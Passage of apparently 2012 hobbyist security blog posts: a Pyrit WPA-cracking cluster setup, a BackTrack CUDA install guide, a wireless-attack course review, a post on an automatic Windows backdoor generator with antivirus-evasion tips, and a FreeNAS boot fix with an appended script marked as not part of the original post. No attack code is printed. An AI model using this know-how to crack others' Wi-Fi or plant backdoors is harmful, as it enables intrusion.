If your system has Hyper-Threading enabled, "limit_ncpus" should be set to the number of real CPU cores. For example, my system has 6 real CPU cores with HT enabled, so the setting is as follows :

limit_ncpus = 6

Bug fix :

nano /usr/local/lib/python2.6/dist-packages/cpyrit/network.py

Locate the following lines :

except socket.error:
   break
if essid != '' or pwbuffer != '':
   pwlist = storage.PAW2_Buffer()
   pwlist.unpack(pwbuffer.data)
   self.client.enqueue(essid, pwlist)
else:
   time.sleep(1)


Change it to :

except socket.error:
   break
if essid != '' or pwbuffer != '':
   pwlist = storage.PAW2_Buffer(pwbuffer.data)
   self.client.enqueue(essid, pwlist)
else:
   time.sleep(1)


Boost the network performance :

nano /usr/local/lib/python2.6/dist-packages/cpyrit/network.py

Locate the following lines :

essid, pwbuffer = \
   self.server.gather(self.client.uuid, 5000)


Change it to :

essid, pwbuffer = \
   self.server.gather(self.client.uuid, 90000)


(B) Client (with or without GPUs) settings

The client does not need the nVidia drivers installed. Just install BackTrack 5 R2 as is. However, if your client has an nVidia display card installed, you should install the nVidia drivers as mentioned above.

The following settings should be set on every client machine.

Run pyrit at least once and you will have the following file at ~/.pyrit/config :

default_storage = file://
limit_ncpus = 0
rpc_announce = true
rpc_announce_broadcast = false
rpc_knownclients = 192.168.0.100
rpc_server = true
workunit_size = 75000


** if you have more than one server, set it as follows (where the IP addresses are those of your servers) :

rpc_knownclients = 192.168.0.100 192.168.0.150

Bug fix :

nano /usr/local/lib/python2.6/dist-packages/cpyrit/network.py

Locate the following lines :

except socket.error:
   break
if essid != '' or pwbuffer != '':
   pwlist = storage.PAW2_Buffer()
   pwlist.unpack(pwbuffer.data)
   self.client.enqueue(essid, pwlist)
else:
   time.sleep(1)


Change it to :

except socket.error:
   break
if essid != '' or pwbuffer != '':
   pwlist = storage.PAW2_Buffer(pwbuffer.data)
   self.client.enqueue(essid, pwlist)
else:
   time.sleep(1)


Boost the network performance :

nano /usr/local/lib/python2.6/dist-packages/cpyrit/network.py

Locate the following lines :

essid, pwbuffer = \
   self.server.gather(self.client.uuid, 5000)


Change it to :

essid, pwbuffer = \
   self.server.gather(self.client.uuid, 90000)


(C) How to run

On the server

pyrit serve

On the client

pyrit benchmark

Remarks :

I have tested these settings on my system with a VirtualBox client. The performance of Pyrit dropped by about half. This is because the VirtualBox client is not on a real network and the CPUs of the VirtualBox client are not real.

By the way, the performance of the cluster drops a lot even in a home gigabit network environment with a ThinkPad X100e client (AMD CPU with no GPU). I think Pyrit is not very good in a network environment at this moment, and the CPU power of the client matters too.

That's all! See you.

Thursday, March 08, 2012

HOWTO : BackTrack 5 R2 on Intel X79 Express and nVidia display cards chipset

UPDATE : The better way is here.

Hardware

CPU : Intel i7-3930K (Socket 2011, 12 cores with HT)
Display card : 2 x nVidia GeForce GTX 590 (1024 CUDA cores per card)

Installation of BackTrack 5 R2

BackTrack 5 R2 can be boot up on Intel X79 Express chipset motherboard with 2 nVidia GeForce GTX 590 display cards. However, "nomodeset" should be applied to the boot option by pressing "tab" on the boot menu.

Install BackTrack 5 R2 as usual. When it asks you to reboot, do not remove the BackTrack 5 R2 CD. Boot from the CD again. After BackTrack 5 R2 is booted up, mount the hard drive and add "nomodeset" to the boot options in grub.cfg under /boot/grub.

After that, reboot the system and remove the CD. The system will boot into BackTrack 5 R2 without problem.

If the kernel is upgraded, you should rebuild the kernel headers with the following steps :

prepare-kernel-sources
cd /usr/src/linux
cp -rf include/generated/* include/linux/


Installation of nVidia display driver

Go to the nVidia Developer Zone CUDA Toolkit 4.1 page to download the following. Do not start X11 by issuing "startx"; otherwise, the installation will fail.

(1) Download "Latest Drivers for Linux (295.20)" for the nVidia Driver. You can download the driver before leaving X11.

32-bit :
http://www.nvidia.com/object/linux-display-ia32-295.20-driver.html

64-bit :
http://www.nvidia.com/object/linux-display-amd64-295.20-driver.html

Installation :

32-bit :
chmod +x NVIDIA-Linux-x86-295.20.run
./NVIDIA-Linux-x86-295.20.run


64-bit :
chmod +x NVIDIA-Linux-x86_64-295.20.run
./NVIDIA-Linux-x86_64-295.20.run


After that, you can reboot your system.

Then run the following command to set a suitable resolution :
nvidia-xconfig

(2) Download "CUDA Toolkit for Ubuntu Linux 10.04" for the CUDA Toolkit.

32-bit :
wget http://developer.download.nvidia.com/compute/cuda/4_1/rel/toolkit/cudatoolkit_4.1.28_linux_32_ubuntu10.04.run

64-bit :
wget http://developer.download.nvidia.com/compute/cuda/4_1/rel/toolkit/cudatoolkit_4.1.28_linux_64_ubuntu10.04.run

chmod +x cudatoolkit_4.1.28_linux_xx_ubuntu10.04.run
./cudatoolkit_4.1.28_linux_xx_ubuntu10.04.run

(where xx is 32 or 64, matching the file you downloaded)

*** Accept the default settings.

(3) Download "GPU Computing SDK" for the nVidia SDK.

wget http://developer.download.nvidia.com/compute/cuda/4_1/rel/sdk/gpucomputingsdk_4.1.28_linux.run

chmod +x gpucomputingsdk_4.1.28_linux.run
./gpucomputingsdk_4.1.28_linux.run


nano /root/.bashrc

Append the following :

PATH=$PATH:/usr/local/cuda/bin
LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/local/cuda/lib:/usr/local/cuda/lib64
export PATH
export LD_LIBRARY_PATH


source /root/.bashrc
ldconfig


After that, reboot the system so the nVidia driver takes effect.

Compile Sample code of CUDA

apt-get install freeglut3-dev libxi-dev libxmu-dev

cd NVIDIA_GPU_Computing_SDK/C
make


Then, run the sample codes at :

cd NVIDIA_GPU_Computing_SDK/C/bin/linux/release
./deviceQuery
./nbody


Installation of pyrit

Add the following to /etc/apt/sources.list :

deb http://security.ubuntu.com/ubuntu lucid-security main

Then install the dependencies :

apt-get update
apt-get install libssl-dev scapy python-dev

Then, delete the newly added entry from sources.list.

apt-get update

Go to the official site of pyrit.

cd ~
svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit

cd pyrit
python setup.py build
python setup.py install


cd cpyrit
python setup.py build
python setup.py install


To test whether the installation is correct :

pyrit list_cores
pyrit benchmark
pyrit benchmark_long


Remarks :

Fix the splash :
fix-splash

Install the sensors :
apt-get install sensors-applet

Pyrit Cluster Setup
John the Ripper Cluster Setup

See Also : HOWTO : Pyrit Cluster with BackTrack 5 R2

*** Whenever the Linux kernel is updated or upgraded, the nVidia driver must be reinstalled to match the upgraded kernel version.

That's all! See you.

Before water cooling



After water cooling

Friday, February 24, 2012

Course Review - Offensive Security Wireless Attacks (WiFu)

The Background

After passing the OSCP, I enrolled for the Offensive Security Wireless Attacks (aka WiFu) course. This course is about how to attack a wireless router, whether it is set to WEP, WPA or WPA2.

The Hardware

You are required to have at least one wireless device to act as the victim (a laptop with a wireless card or a smartphone, such as Android or iPhone) and a computer with BackTrack 5 R1 installed as the attacker. The attacker machine should have a USB adaptor (one of the USB adaptors recommended on the official site). If you do not have a wireless device to act as the victim, consider buying a wireless USB dongle for your desktop.

Furthermore, you are also required to have a wireless router or access point equipped with WEP and WPA/WPA2 features (the models are recommended on the official site).

Beware that not all wireless dongles or wireless cards support injection and monitor mode. In addition, some wireless routers behave unexpectedly during the attacks. For example, my dd-wrt flashed TP-LINK TL-WR1043ND does not work with some of the attacks, such as the Korek Chopchop attack. However, not all access points are vulnerable to the Korek Chopchop attack anyway. Therefore, buying the hardware suggested on the official website is recommended.

At the time of this writing, the Netgear WNR1000v2h2 N150 can be bought in Hong Kong and it is not so expensive. However, I am not sure if this model is the one stated on the official site. You should not upgrade the firmware; instead, downgrade it to v1.0.1.1, as the other firmware versions do not provide WEP. The older firmware can be downloaded from the Netgear official site.

My hardware for the lab is as follows. Hopefully it gives you some idea :
(1) Access Point - TP-LINK TL-WR1043ND (flashed with dd-wrt v24-sp2 18024) (can be injected)
(2) Access Point - Netgear WNR1000v2h2 N150 (firmware v1.0.1.1)
(3) Victim - Google Nexus One (Android 2.3.6)
(4) Victim - TP-LINK TL-WN321G (54Mbps, Ver 4.1) (supports injection and monitor mode)
(5) Victim - TP-LINK TL-WN821N (300Mbps, Ver 3.1) (supports injection and monitor mode)
(6) Attacker - Cloned ALFA Networks AWUS036H USB 500mW (Realtek RTL8187L)

The Course

This course, version 3.0, is designed for beginners. It teaches you the wireless concepts and their weaknesses. The most mentioned tool is the Aircrack-NG Suite, but it also mentions others, such as tools that use GPUs for brute forcing and other advanced tools. However, it does not cover WPA/WPA2-Enterprise attacks.

Offensive Security does not provide any lab for you to access. You are required to set up your own lab for practice. The hardware mentioned above is required for setting up your own lab.

The Challenge

The four-hour challenge requires you to SSH to a BackTrack box in order to complete the objectives. After the challenge, you are required to submit your report within 24 hours.

Finally, the exam was over. Within 3 business days, I received an email which informed me that I passed the challenge. If you passed the challenge, you will be an Offensive Security Wireless Professional (OSWP). I am an OSWP now!

The Conclusion

In conclusion, this course will teach you the basics of wireless cracking.

Sunday, February 12, 2012

Automatic Backdoor Generator for Windows System

Astr0baby developed an automatic tool to generate a backdoor for Windows systems.

Later, www.coresec.org modified his work to make it work on Back|Track 5. So, I made the modified source code available here.

Then, I slightly modified coresec.org's work and made a video here for reference.



The anti-virus evasion of the generated file is not too good, because some users submitted the generated file to the free anti-virus scanners on the web and/or local anti-virus programs to confirm whether it can be detected or not. The problem is that the free scanners on the web submit the sample to their companies for further analysis, so the detection rate will be higher; they are a kind of honeypot. Therefore, if you want to test the generated file locally, please make sure the box cannot reach the internet, as the result will be submitted to the anti-virus company after the scan.

I found the automatic generation of backdoors quite interesting. I completely rewrote the code, and it can be embedded into an executable file. The code can do some simple input data validation too. The current version is 0.2 at the time of this writing. I made a video for the demo. However, the code will not be available at the moment, as I am still considering whether to release the source code or not.



Backdoors can also be embedded into PDFs and image files in a similar way. Therefore, do not download any programs, PDFs or image files from untrusted sources. Be especially alert to cracked software and "free" licensed ebooks. This does not only affect Windows systems; Linux or Mac OS can be infected too.

That's all! See you.

Sunday, February 05, 2012

HOWTO : FreeNAS 8.0.3 RELEASE p1 USB device boot bug fix

The Problem

When I upgraded my FreeNAS to the latest version, FreeNAS 8.0.3 RELEASE p1, it refused to boot and stopped at the following message.

mountroot> GEOM: da0s1: geometry does not match label (16h,63s != 255h,63s).
GEOM: da0s2: geometry does not match label (16h,63s != 255h,63s).


I typed the following command and it booted fine.

ufs:/dev/da0s1a

The problem is that I need to type the captioned command on every boot. Can this be solved? Yes, it can.

The Solution

After the system boots up, a menu is displayed. Select "9) Shell" to get a shell prompt, where we can do the following.

Step 1 :

nano /etc/fstab

Change from :
/dev/ufs/FreeNASs1a / ufs ro 1 1

To :
/dev/ufs/FreeNASs1a / ufs rw 1 1

Step 2 :

Then, save and exit the editor. Execute the following command :

mount -a

Step 3 :

Next, open up another file :

nano /boot/loader.conf

Change from :
#Fix booting from USB device bug
kern.cam.boot_delay=10000


To :
#Fix booting from USB device bug
kern.cam.boot_delay=20000


Save and exit the editor. Then reboot. This time, the boot is much slower than before, but it works. Problem solved!
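The three steps above, applied non-interactively, as an added example that is not part of the original post. It edits constructed copies of fstab and loader.conf (the real files are /etc/fstab and /boot/loader.conf) and avoids "sed -i", whose syntax differs between the BSD sed on FreeNAS and GNU sed.

```shell
# set_conf_value FILE KEY VALUE: rewrite "KEY=..." in a loader.conf-style
# file, or append the line if KEY is not set at all (edge case: a fresh
# loader.conf that never had the boot_delay line).
set_conf_value() {
  file=$1; key=$2; value=$3
  tmp="${file}.tmp.$$"
  if grep -q "^${key}=" "$file"; then
    sed "s|^${key}=.*|${key}=${value}|" "$file" > "$tmp"
  else
    cp "$file" "$tmp"
    printf '%s=%s\n' "$key" "$value" >> "$tmp"
  fi
  mv "$tmp" "$file"
}

# get_conf_value FILE KEY: print the last value assigned to KEY (empty if unset).
get_conf_value() {
  sed -n "s|^${2}=||p" "$1" | tail -n 1
}

# set_root_rw FSTAB: change the mount options of the "/" ufs entry to rw,
# leaving every other line untouched.
set_root_rw() {
  file=$1
  tmp="${file}.tmp.$$"
  awk '$2 == "/" && $3 == "ufs" { $4 = "rw" } { print }' "$file" > "$tmp"
  mv "$tmp" "$file"
}

# Demo on constructed copies of the two files from the post.
demo=$(mktemp -d)
printf '/dev/ufs/FreeNASs1a / ufs ro 1 1\n' > "$demo/fstab"
printf '#Fix booting from USB device bug\nkern.cam.boot_delay=10000\n' > "$demo/loader.conf"
set_root_rw "$demo/fstab"                                   # Step 1
set_conf_value "$demo/loader.conf" kern.cam.boot_delay 20000   # Step 3
cat "$demo/fstab" "$demo/loader.conf"
rm -rf "$demo"
```

On the real system, run "mount -a" (Step 2) between set_root_rw and set_conf_value, since /boot is read-only until the root file system is remounted.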

That's all! See you.